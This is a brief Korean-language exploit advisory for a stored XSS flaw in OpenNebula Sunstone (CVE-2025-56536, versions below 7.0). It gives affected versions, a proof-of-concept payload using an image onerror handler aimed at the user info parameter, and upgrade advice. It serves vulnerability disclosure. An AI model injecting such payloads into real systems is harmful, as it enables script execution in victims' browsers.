
OpenNebula Sunstone(CVE-2025-56536)을 위한 저장형 XSS 익스플로잇으로, 버전 < 7.0에서 사용자 정보 파라미터를 대상으로 하는 개념 증명 페이로드 포함
Exploit Title : OpenNebula 6.10.0.1 - 사용자 정보에 저장된 XSS (사이트 간 스크립팅)
Exploit Author : Mark Artamonov
Vendor Homepage : https://opennebula.io/
Tested Version : OpenNebula 6.10.0.1
Affected Versions : OpenNebula < 7.0
Affected Component : opennebula-sunstone
CVE ID : CVE-2025-56536
opennebula v6.10.0.1의 저장형 사이트 간 스크립팅(XSS) 취약점으로, 공격자가 사용자 정보 매개변수에 조작된 페이로드를 주입하여 임의의 웹 스크립트나 HTML을 실행할 수 있습니다.
<image src =q onerror=prompt(8)>
OpenNebula >=7.0으로 업그레이드하세요.